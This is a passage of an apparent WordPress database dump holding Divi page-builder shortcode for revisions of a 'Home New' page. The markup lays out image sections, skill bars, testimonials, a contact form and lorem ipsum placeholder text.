perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-02.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-03.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-05.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-04-1.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"0px||90px|\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"3.22\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#fcd21d\" use_percentages=\"off\" _builder_version=\"3.0.87\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#fcd21d\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#fcd21d\" use_percentages=\"off\" allow_player_pause_default=\"off\"]UX Research - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#fcd21d\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Interface Design - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"3.22\" background_color_gradient_direction=\"90deg\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/background-split-03-1.jpg\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/MB-purefront-02.png\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever.\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2>Award winning Design</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Maecenas metus sapien, tempus nec lectus vitae, varius porttitor turpis. Ut sit amet tincidunt nulla, nec ultrices est. Aliquam sollicitudin tempor dui, ac accumsan metus vulputate sit amet. Donec placerat rutrum tellus et.</span></p>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Product\" use_icon=\"on\" font_icon=\"%%65%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"3.0.83\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"fade\" animation_direction=\"bottom\"][/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Branding\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"3.0.82\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"][/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-06.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"3.22\" background_color=\"#fcd21d\" custom_padding=\"110px||110px|\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form captcha=\"off\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"3.23\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Company\" field_title=\"Company Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"3.16\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home New','','inherit','closed','closed','','564-revision-v1','','','2020-08-07 20:08:28','2020-08-07 20:08:28','',564,'https://wthtest1.in8.cdn-alpha.com/2020/08/07/564-revision-v1/',0,'revision','',0),(591,1,'2020-08-07 20:08:45','2020-08-07 20:08:45','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\" hover_enabled=\"0\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.2\" background_color=\"#fcd21d\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/banner.jpg\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px||0px|\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" hover_enabled=\"0\" make_fullwidth=\"on\" alt=\"Main Banner WhatTheHell?\" title_text=\"main banner \"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" global_module=\"569\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome 